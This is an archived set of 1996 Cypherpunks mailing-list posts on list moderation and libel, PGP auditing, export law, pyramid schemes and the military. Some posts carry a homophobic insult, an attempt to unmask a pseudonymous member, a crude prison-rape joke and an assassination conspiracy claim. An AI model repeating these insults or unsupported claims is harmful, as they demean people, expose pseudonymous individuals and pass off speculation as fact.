time. And I try not to spend time on unproductive pursuits. So I am not
going to write more about this. I've offered my analysis, and readers can &
will give it whatever weight they think it merits. If I don't respond to
your messages, it's not because I don't think you're wrong, it's because I
don't think saying it over & over helps anyone. Mike Godwin has written and
thought a lot about liability for defamation in the online service provider
context. I recommend his work to people who want to learn more.

It's clear that you think John Gilmore did the wrong thing when he excluded
Vulis. The notion that a relatively inflexible and harsh liability scheme
awaits system operators who wander into some form of content control can be
an attractive one. I don't blame you for liking that idea. But your
conclusion is not supported by case law nor traditional theories of
contract, tort, or property law. The result you want (any content control =
duty to inspect every message = harsh result) might be a good one but it is
not the state of the law today. If you're getting your legal information
from computer media or mass media you're probably getting partially
incorrect information or interpretation. 

--
Greg Broiles                | "In this court, appellant and respondent are the
gbroiles@netbox.com         |  same person. Each party has filed a brief."
http://www.io.com/~gbroiles |  Lodi v. Lodi, 173 Cal.App.3d 628, 219 Cal.
                            |  Rptr. 116 (3rd Dist, 1985)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@adsl-122.cais.com>
Date: Sat, 9 Nov 1996 23:46:52 -0800 (PST)
To: ravage@EINSTEIN.ssz.com (Jim Choate)
Subject: Re: Mailing list liability (fwd)
In-Reply-To: <199611100513.XAA01797@einstein>
Message-ID: <9611100746.AA15293@adsl-122.cais.com>
MIME-Version: 1.0
Content-Type: text



Jim,

After having read the post where you go the dinosaur route, and
read it carefuly I might add, I have to tell you that I disagree
with you on some pretty basic levels.

The first being that lists are not so much editorialized publications,
as they are vehicles for community. That irrguardless of wether they
are moderated or unmoderated. I belive that argument would be
both easy to argue, and easy to understand in a court. And I think
it'd win.

As for the list dying off, it's in far greater danger of dying off
from off-topic noise and the sort of childish potty insults Vuilis
was spamming the list with. If you don't goto a "big issue" mentality,
and just look at it from the point of veiw of basic subscription,
and basic interest, this is blindingly obvious.

In any case, I don't know which is worse, Vulis's spam, or the spam
about Vulis and his removal. There's not a whole lot of difference,
neither are relivant to crypto, and they're about equaly as annoying.


Tim Scanlon







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Sun, 10 Nov 1996 04:03:22 -0800 (PST)
To: SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil
Subject: Re: a retort + a comment + a question = [RANT]
In-Reply-To: <9610108476.AA847661103@smtp-gw.cv62.navy.mil>
Message-ID: <Pine.LNX.3.94.961110024934.5826B-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Nov 1996 SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil wrote:
[...]
>  little guys in uniform?  mr may - i serve in the US Navy so you don't 
>  have to, 

As said in "Hair" (the movie), "Don't do it for me man, 'cause if the shoe
was on the other foot, I wouldn't do it for you!" 

It's a lie anyway, you do it for yourself.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@pobox.com>
Date: Sun, 10 Nov 1996 01:22:21 -0800 (PST)
To: bgrosman@healey.com.au (Benjamin Grosman)
Subject: Re: Pyramid Schemes
In-Reply-To: <2.2.32.19961111045417.00967cb0@healey.com.au>
Message-ID: <199611100923.EAA24190@gate.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


An entity claiming to be Benjamin Grosman wrote:
: 
: Dear Sir,
: 
: Aren't these Pyramid Schemes Illegal?
: 
: Yours Sincerely,
: 
: Benjamin Grosman
: 

Yep, 18 U.S.C. sec. 1343 if I remember correctly ... one of the only
laws I truly appreciate.  I've already sent a message to 
postmaster@mindspring.com pointing out the fact that a felony has
been committed.

-- 
[]  Mark Rogaski                    
[]  wendigo@pobox.com               
[]  http://www.pobox.com/~wendigo/  
[]  >> finger for PGP pubkey <<     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hayashi_Tsuyoshi <take@barrier-free.co.jp>
Date: Sat, 9 Nov 1996 12:47:26 -0800 (PST)
To: coderpunks@toad.com
Subject: Re: New Linux-IPSEC mailing list for the S/WAN project
In-Reply-To: <1.5.4.32.19961109184728.005bbe40@popd.ix.netcom.com>
Message-ID: <199611092044.FAA19938@ns.barrier-free.co.jp>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 09 Nov 1996 10:47:28 -0800, stewarts@ix.netcom.com said:
 >At 01:29 AM 11/9/96 -0800, John Gilmore <gnu@toad.com> wrote:
 >>ask questions, etc.  To join the list, send mail to:
 >>	linux-ipsec-REQUEST@clinet.fi
 >>The email should contain a single line that just says:
 >>	subscribe
 >
 >Actually, it needs to say
 >        subscribe linux-ipsec

Probably, it needs to send mail to:
	Majordomo@clinet.fi

///hayashi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 10 Nov 1996 07:19:40 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: A Disservice to Mr. Bell
In-Reply-To: <199611091958.LAA14950@mail.pacifier.com>
Message-ID: <3285F1D8.3C5E@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> At 02:18 PM 11/8/96 -0800, Peter Hendrickson wrote:
> >At 1:32 PM 11/8/1996, jim bell wrote:
> >>At 09:12 PM 11/7/96 -0800, Peter Hendrickson wrote:
> >>> ...His conviction was not reversed until 1983 in the court of one Judge Patel...

> >> However, the fact that it took 40 years to reverse (and didn't, presumably,
> >> reverse the convictions of others, and didn't compensate people for lost
> >> property) is yet another reason to take a few pieces out of the hide of the
> >> SC, as well as a few pounds of flesh nearest the heart.

[snip]

> Interestingly enough, the one thing the Commonlaw court system needs is an
> effective enforcement system.  One likely method is the commercial lien
> process, but even that tends to be resisted by people who are far more used
> to dealing with equity court personnel.  It turns out that my AP system
> seems to mesh almost perfectly with their needs, although obviously in
> practice it would only be used as a "last resort."

Speaking of Common Law courts and their Liens, the feds have expanded their crackdown
begun with the Freemen of Montana.  They arrested Elizabeth Broderick and several of
her associates or whatever, and I know at least one person personally who is hiding
or keeping a very low profile at least.  [these are people in the common law/lien
business]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 10 Nov 1996 06:35:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Black Unicorn exposed?
In-Reply-To: <199611092116.QAA05345@wauug.erols.com>
Message-ID: <TBg7wD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com> writes:
> Peter Hendrickson sez:
> >
> > At 11:00 AM 11/9/1996, Robert Hettinga wrote:
> > > S. L. vonBernhardt, <mailto:unicorn@schloss.li>,...
> >
> > Black Unicorn recently stated that had taken measures to shield
> > his identity so that people would be unable to cause harm to
> > his professional activities by making unsubstantiated claims
> > that could scare off prospective clients.
> >
> > It appears now that this protection has evaporated.
>
> How do you know he does not have a THIRD name........?

I did some (very perfunctory searching in some engines and it seems that
_von_ Bernhardt is an extremely unlikely name. I did find a guy named
Rudolf Bernhardt who writes in international law, and a lawyer named
Stephen Bernhardt in Hamburg (?I forgot I already :-). It sounds like
another pseudonym.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 10 Nov 1996 06:36:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Timmy
In-Reply-To: <199611092250.PAA23102@teal.csn.net>
Message-ID: <mJg7wD12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"L.Detweiler" <ldetweil@csn.net> writes:
> just heard an interesting rumor that Timmy has been blacklisted
> from working anywhere here in Colorado as a dangerous anarchist
> and/or lunatic revolutionary.

It's probably true not only in Colorado.

> besides, everyone here in CO would prefer all the
> anarchists stay in CA anyway so they can all be taken care of
> in one fell swoop with the next "big one".. did I feel
> a little "trembling" over there or is it just the standard cpunk
> cowardice? (hehehe)

Yes - it's ironic that a coward like John Gilmore stays in San Francisco
where he exposes himself to both AIDS and earthquakes.

Does anyone have the e-mail address or a snail mail address for judge
Kozinski? I'd like to send him Jim Ray's false complaint to postmaster@bwalk
with my comments.

Thanks,

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Sun, 10 Nov 1996 07:42:34 -0800 (PST)
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: Black Unicorn exposed?
Message-ID: <v02140b00aeab9f25f781@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:30 PM 11/9/1996, Robert Hettinga wrote:
>At 12:45 pm -0500 11/9/96, Peter Hendrickson wrote:
>> We are hardly operating in a hostile environment.  Yet, somebody
>> who has apparently gone to some effort to have an anonymous
>> identity has been exposed.  The implications of this are worth
>> considering.

> Nope. Sorry, Pete. Hope you didn't throw out your sholder, swinging for the
> fences like that. ;-).

Phew!  While this news leaves me looking foolish, I am relieved.

Now for my real question: Does the One True Cypherpunk really have
a black unicorn on his coat of arms?

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Sun, 10 Nov 1996 07:42:43 -0800 (PST)
To: "Mark M." <bgrosman@healey.com.au>
Subject: Re: Legal Deffinition of Encryption?
Message-ID: <v02140b02aeaba1c8961f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:17 PM 11/9/1996, Mark M. wrote:
>On Sat, 9 Nov 1996, Benjamin Grosman wrote:
>> I have absolutely no idea: this is a very interesting problem. Not for just
>> compression and encryption differention legally, but also, well, ANY other
>> data form. If one defines a new format for saving data (i.e a new image
>> format), and then exports this technology from the USA, is this exportation
>> of munitions due to it's unknown qualities? Or what?
>> I know that in Australia there have been problems defining electronic data,
>> especially pictures (usually porn), for the purposes of prosecution.
>> Because, really, a pornographic picture is no more than 1's and 0's arranged
>> in a different way by a different algorithm.
>> Thus I think it most likely that the law would try and approach it from the
>> direction of the algorithm that saved the data and the intent with which the
>> algorithm was written.
>> Otherwise, I don't know.

> I can't define encryption, but I know it when I see it.

They way it will be forbidden is by outlawing the execution of the
algorithms.  The algorithms (the secure ones anyway) are well defined
as is executing them.  The legal system has dealt with greater
ambiguities than this.

An analogy to the drug laws might be useful.  We don't outlaw all drugs
that cause you to have weird visions and to act strangely.  That would
be hard to define and would cover a number of legal drugs.

Instead, the specific chemicals are forbidden as they are discovered.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Sun, 10 Nov 1996 07:42:46 -0800 (PST)
To: Jim Choate <cypherpunks@toad.com
Subject: Re: Pseudo-law on the list and libel (fwd)
Message-ID: <v02140b03aeaba3b90ae8@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:21 AM 11/9/1996, Jim Choate wrote:
> The real issue here is that folks on the net want the protection of the 1st
> Amendment but they don't want the responsibility that goes along with it.
> This list qualifies as a press. As a result it has a responsibility relating
> to what it distributes.

I don't find the word "responsibility" in the First Amendment.

You and the courts may decide John has a responsibility to let other
people use his computer, but the source of this idea is not the
First Amendment.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sun, 10 Nov 1996 08:17:19 -0800 (PST)
To: Gemini Thunder <gt@kdn0.attnet.or.jp>
Subject: Re: RSA and me...
In-Reply-To: <32889cc0.76991108@kdn0.attnet.or.jp>
Message-ID: <Pine.3.89.9611100849.A26358-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Nov 1996, Gemini Thunder wrote:

> 'Lo.
> Is the "RSA in 3 lines of Perl" a munition (under ITAR)?
> What if I got it as a tatoo?  

Somebody did this. Check the RSA in perl homepage.

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Member JPFO. "America's Aggressive Civil Rights Organization"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 10 Nov 1996 09:30:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Information [for new PGP user]
Message-ID: <328600B9.5168@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Adamsc wrote:
> On Thu, 07 Nov 1996 07:08:52 -0800, Dale Thorn wrote:
> >> >> > I'm a new Cyberpunk!
> >> Probably wearing a set of Ono-Sendai eyeballs....
> >> >> > Last,  I would like to know once and for all,  is PGP compromised,  is
> >> >> > there a back door, and have we been fooled by NSA to believe it's secure?
> >> You can read and compile the source code yourself.
> >Really?  All 60,000 or so lines, including all 'includes' or attachments?
> >I'll bet you can't find 10 out of 1,000 users who have read the total source,
> >let alone comprehended and validated it.

> That's not necessary - it's the fact that it's possible that matters;  most
> of us are content to trust the various people who actually have.  However,
> I'd probably be inclined to look into it seriously if I was going to use it
> on anything incriminating or potentially linked to my checkbook...

My main point, which is really difficult to make, since software issues
are so complex today, is that I've been involved with projects on a
similar scale as PGP, where several programmers contributed code to a
particular executable program, and when this is the case (especially
where the source is not obvious as would be data entry code and the like),
it's just not practical for one person working alone, unpaid, to break
the source down into manageable chunks and study it and make enough notes
so that every portion of it is clearly understood and validated.

People in the past have discussed 50 million line Fortran programs to set
up jet training simulators and so forth, and by comparison a 60,000 line
source in 'C' might look doable, as far as complete annotation is concerned.

To illustrate the point, then, I recently had a chance to estimate the cost
of converting a non-'C' program to 'C', which would result in a 'C' program
of about 6,000 lines, or about 1/10 the size of PGP.  My best guess was
about 500 to 1,000 hours, and to analogize that to PGP, where I wouldn't be
writing or converting code ostensibly, just annotating it, I would still
guess 2,500 to 5,000 hours, if the job were done correctly and thoroughly.

If the job is not practical/feasible, then IMO I can say it's not doable.

OTOH, if some one or a handful of people wanted to make the source code
of PGP really accessible to the masses (of programmers at least), they
should start with a plan to make sure it's broken down into a heirarchy
of functions so that:

1. No one function is too large (say, no more than 50 lines or so).

2. All functions use reasonably short variable names (ex: 'iTrapon').

3. Variable names are consistent in capitalization.

4. Function names follow the heirarchy and are logically intuitive.

5. Constant and #define names follow a heirarchy as well.

6. Where a choice is possible between setting out a construct that
   (visually speaking) looks very complex and is difficult to follow,
   and making it simpler, take the simpler path.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 10 Nov 1996 09:30:11 -0800 (PST)
To: drose@AZStarNet.com
Subject: Re: His and Her Anarchies
In-Reply-To: <199611100556.WAA16087@web.azstarnet.com>
Message-ID: <3286045D.5564@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


drose@AZStarNet.com wrote:
> Dale Thorn <dthorn@gte.net> wrote:
> >While many, many
> >women have harrassed me on the road for my driving, they (unlike men, w/o
> exception)
> >have *never* tried to threaten me directly, as have hundreds of men.

> Might all these hundreds of threatening men and many, many harassing women
> be trying to tell you something?

Glad you asked!!  Precisely, as in a prison situation, where you're locked
in with some big hairy hillbilly, they're trying to say:

"Bend over, a______"

[snippo]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MatriX Spider <matrix@citenet.net>
Date: Sun, 10 Nov 1996 05:35:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Small question about the list
Message-ID: <1.5.4.32.19961110134153.00695580@citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi,
        I've been around the Cypherpunk list for a couple of month now and
it don't correspond exactly to what I've expect.  

I would be realy happy if someone could tell me the adress to remove my name
from the distribution list.

Could anyone send me the procedure on how to remove my name of the list ?

Thanks for your time and for your help,
MatriX.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 10 Nov 1996 09:31:46 -0800 (PST)
To: SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil
Subject: Re: a retort + a comment + a question = [RANT]
In-Reply-To: <9610108476.AA847661103@smtp-gw.cv62.navy.mil>
Message-ID: <32860D5B.3978@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil wrote:
>  tim may wrote:
>  >"...and that discussions of other topics bother you should be a clear
>  >indication you're probably on the wrong list."
>         uh, that's _why_ i am on this list...

[ka-snip, ka-snip]

>  dale thorn(?) wrote:

[mo' snip]

>  >Second, any truly secret messaging taking place represents a serious
>  >threat to the military, and contrary to some naive popular opinion,
>  >those guys are not going to lay down for this...

>  what does the military have to do wiht private citizens conversing in
>  secret?

Why should they care?  Huh?  Well, unless you can give them a list that
separates all the sheeple from the wolves, I guess they'll have to
continue their random monitoring just to make sure...

> are _you_ one of the naive that think men actually in uniform control
> the military?  the SecDef is a civillian. the president is a democrat.

Does anyone really care that the "persons in charge" wear uniforms?

> the military does what the white house/congress tell it (the writer
> realizes this is a vastly over-simplified response to a vastly broad statement).

Oh, sure they do.  Let me tell you something.  Big money tells little
money what to do.  I won't bother you with details, as it's beyond the
capacity of email at this time.  But if you think the President is really
in charge, sorry, he's "administratively" in charge, and subject to:

1. Impeachment (the "normal" method of removal, if he doesn't play ball).

2. Other kinds of removal, by Big Money, some of which are very messy.
   Go look at the Zapruder film.  If you think "Oswald" did it, don't
   even bother to reply, as such a reply would go unread.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gt@kdn0.attnet.or.jp (Gemini Thunder)
Date: Sun, 10 Nov 1996 01:15:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: RSA and me...
Message-ID: <32889cc0.76991108@kdn0.attnet.or.jp>
MIME-Version: 1.0
Content-Type: text/plain


'Lo.
Is the "RSA in 3 lines of Perl" a munition (under ITAR)?
What if I got it as a tatoo?  
_______________
- 2[b]||!2[b], what's the question? It's a tautology!
- PGP key now available on finer keyservers everywhere.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Sun, 10 Nov 1996 10:27:52 -0800 (PST)
To: SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil
Subject: Re: a retort + a comment + a question = [RANT]
In-Reply-To: <9610108476.AA847691156@smtp-gw.cv62.navy.mil>
Message-ID: <Pine.LNX.3.94.961110074445.5826C-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Nov 1996 SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil wrote:

> ----------------------------------------------------------------------
> dave kinchlea wrote:
> >As said in "Hair" (the movie), "Don't do it for me man, 'cause 
> >if the shoe was on the other foot, I wouldn't do it for you!" 
> 
> >It's a lie anyway, you do it for yourself.
> 
> That's an _easy_ judgment to make (and i definitely have to stop 
> adding anecdotes from my life in these things!), but you missed the 
> point - the freedoms the Cpunks diligently try to preserve (or seem to 

I missed nothing, I simply don't agree. It seems to me that the US
military is much more the agressor than the defender. Just who is it that
you are believe you are defending against? What year do you live in?

> want to create...) are protected _by_ the military.  who was it that 
> said:       "law, without force, is impotent"  -?  

The military is NOT the defender of laws, that is the job for the civilian
police. Are you really that confused? I actually live in Canada where I
enjoy the same or more freedoms that you do, funny thing though, we don't
find it necessary to have a large military force to `protect' us. 

[...]

> 
> was i assuming that you've read the book and/or seen the broadway 
> play, "Hair"?  OHHHHH - i'm sorry - you saw the _movie!_ shame on me.

What the fuck is this? When did the play end on broadway, mid-seventies?
Do you have a point? I thought not. The only reason I pointed out that it
was the movie is because I am not certain that that line IS in the play.
You see I practice something called honesty, something you might do well
to learn about yourself.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 10 Nov 1996 09:17:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Pyramid Schemes
In-Reply-To: <2.2.32.19961111045417.00967cb0@healey.com.au>
Message-ID: <v03007800aeabbd7e613b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:23 AM -0500 11/10/96, Mark Rogaski wrote:
>An entity claiming to be Benjamin Grosman wrote:

>: Aren't these Pyramid Schemes Illegal?

>
>Yep, 18 U.S.C. sec. 1343 if I remember correctly ... one of the only
>laws I truly appreciate.  I've already sent a message to
>postmaster@mindspring.com pointing out the fact that a felony has
>been committed.

I deleted the original spam, but from my brief glance at it, it may have
been more of a multi-level marketing (MLM) scheme than a simple
pyramid...something about selling mailing list services. And of course MLMs
are mostly protected, else Amway, Herbalife, Avon, and all the other such
MLMs would not survive.

But I have a more radical view: pyramid schemes should not be illegal.

They are classic nonviolent behaviors, and are not even examples of fraud.
(Because it is _true_ that if one succeeeds in getting enough people to
follow one on the chain, profits come in. It is also true that a large
fraction of participants will see only losses. So?)

Thus, people against pyramids should educate people if they want to, should
try to get them not to participate. But I can't support hiring men with
guns to force people not to participate.

(And there are ways that cryptography allows "crypto-pyramids," though I
doubt many crypto-savvy folks would participate.)

BTW, predictions of great returns in pyramids if instructions are followed
closely are not different from predicitions of earthly and heavenly rewards
if religious commands are followed. Outlaw one, outlaw the other.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ".echo" <echo68916@delphi.com>
Date: Sun, 10 Nov 1996 07:23:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Timmy
Message-ID: <2.2.32.19961110152525.0068a3c8@pop.delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
>Comments: Dole/Kemp '96!

  You can remove Dole/Kemp from your email headers, since the election is past.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
.echo
echo68916@delphi.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 10 Nov 1996 09:39:22 -0800 (PST)
To: SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil
Subject: Re: a retort + a comment + a question = [RANT]
In-Reply-To: <9610108476.AA847691156@smtp-gw.cv62.navy.mil>
Message-ID: <Pine.SUN.3.91.961110085723.7792B-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 10 Nov 1996 SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil wrote:

> ...the freedoms the Cpunks diligently try to preserve (or seem
> to want to create...) are protected _by_ the military. 

Wrong on two counts:

1) Strictly speaking, the C'punks list is primarily concerned 
   with privacy.  Of course, most of us seem to have strong
   interest in freedom, but the original intent of the list 
   founders was the "self-help" preservation of privacy through
   technological means. 

2) Putting aside that nit-pick, we are still left with two  
   implicit and unsupported assumptions:

   a) military=government.  
   b) military/government doesn't also threaten freedoms.

As to a), market anarchists (aka, anarcho-capitalists) believe
that militaries would be better provided by private business.
The concept is usually called "private defense agencies."  The
conservative preference is for para-military "militias."  I have
no intention of getting into a debate over these concepts.  I
mention it only for the purpose of pointing out that alternative
do exist and the fact that governments--through force of the
threat of force--maintain their monopoly hold on the instruments
of war does not mean we are better off for that fact.

With regard to b), governments--primarily through the use of 
their militaries--have killed, by some counts 170,000,000, men,
women and children in this century alone.  Hardly the guardians
of freedom, in my opinion.

> who was it that said:  "law, without force, is impotent"  -?  

He says that as if it's a bad thing.

> keep in mind that even "bad" laws have to be enforced. 

Actually, this is not true either.  In the US at least, if a law
is unconstitutional, it is void ab initio.  The military ananlogy
is found in the Uniform Code of Military Justice.  A subordinate
is not required to follow an order that violates the UCMJ.  The
international version was enunciated at the Nurenburg trials. "I
was only following orders" is not esculpatory.

> ...anarchy implies ruthlessness

To some people, yes.  Literally--and that's how most libertarians
and anarchists use it--it means no rulers.  In my opinion, 
observation and experience and experience rulers, government and
military imply ruthlessness far more directly.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 10 Nov 1996 09:25:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Small question about the list
In-Reply-To: <1.5.4.32.19961110134153.00695580@citenet.net>
Message-ID: <v03007801aeabc0a51edb@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:41 AM -0500 11/10/96, MatriX Spider wrote:
>Hi,
>        I've been around the Cypherpunk list for a couple of month now and
>it don't correspond exactly to what I've expect.
>
>I would be realy happy if someone could tell me the adress to remove my name
>from the distribution list.
>
>Could anyone send me the procedure on how to remove my name of the list ?


I've posted the instructions _several_ times in the last week or two.
(Others have also provided instrutctions.) You obviously are not even
looking at messages. Which is fine. Except how  do you expect to find the
instructions if someone _does_ send them to you?

Nevertheless, I am again including them below. I doubt it will help.

I predict MatriX Spider (how clever) will soon be issuing frantic
"unsudcribe" and "unsribe" messages to this list.

--Tim



To subscribe to the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: subscribe cypherpunks

To unsubscribe from the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: unsubscribe cypherpunks







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 10 Nov 1996 09:49:31 -0800 (PST)
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: Apology to Dale Thorn
In-Reply-To: <199611101830.MAA28727@mailhub.amaranth.com>
Message-ID: <32861563.994@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


William H. Geiger III wrote:
> In <328523F4.3BC@gte.net>, on 11/09/96 at 04:38 PM,
>    Dale Thorn <dthorn@gte.net> said:

[snip]

> I am confused by Dale's repeated attacks on PGP without offering viable
> alternatives for a public-key encryption system.
> Sorry, I'll try to rember ot count to 10 before I post replies to the list. :)

I've made errors attributing stuff to wrong parties (oops, cringe).

And I apologize for not offering a viable alternative to PGP.

In another posting, I made a suggestion for making the source code to
PGP *really* public, i.e., in a form that the average programmer can
verify and edit (for personal use only, of course).

I'm tending to think that, instead of using PGP for all encoding (even
though it may have multiple facilities for all situations), a message
could be encrypted with a good trusted private-key system or whatever,
then the private key encrypted with the Public Key software and sent
either separately or with the message.

The above might be more cumbersome, but it could be automated with
messaging automation techniques. At least it would reduce the dependence
on PGP to encrypting only the private key(s), which would encourage using
PGP at its most secure (slowest) level of encryption for the entire process
of encrypting the private key data.  As an aside to OTP's, this would not
apply for obvious reasons, i.e., the length of the key.

Of course, this still requires validation of PGP in whatever portion of
the code would be required to encode the private key.  My recommendation
for really serious users would be to separate out that code and recompile
it separately from the remainder of PGP (for personal use only, of course).

And in case it got lost in my rhetoric, I do appreciate that there's no
substitute for the Public Key process.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Darkened-Node <darkened-node@geocities.com>
Date: Sun, 10 Nov 1996 10:39:06 -0800 (PST)
To: gnu@toad.com
Subject: Hello from the Brotherhood
Message-ID: <1.5.4.16.19961110133848.2a37b3aa@mail.geocities.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello to everyone from the Brotherhood of Darkness

Fellow Cypherpunks:
Please visit our site at:
http://www.ilf.net/brotherhood/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Darkened-Node

Executive Member
        -THE-
-BROTHERHOOD-
 -OF DARKNESS-

    Comments or Questions?
Darkened-Node@Geocities.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Sun, 10 Nov 1996 07:51:50 -0800 (PST)
To: "William F. Towey" <liam@webspan.net>
Subject: Re: allow me to state the obvious....
In-Reply-To: <32852789.EB0@webspan.net>
Message-ID: <Pine.LNX.3.95.961110102726.14929A-100000@tgrafix.livesys.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To remove oneself from the CypherPunks mailing list, one MUST follow
these instructions TO THE LETTER.  Results from these instructions
could take up to two weeks to take effect.

1) Send a mail message to majordomo@toad.com.

   To: majordomo@toad.com
   From: you@your.domain
   Subject: unsubscribe cypherpunks you@your.domain

   unsubscribe cypherpunks you@your.domain
   <EOT>

2) Obtain 1 (one) bottle of tequila (Cuervo Gold, 1.5 liter)
3) Contact Ted Garrett <teddygee@visi.net> for a snail-mail address
   to send the bottle of tequila to.
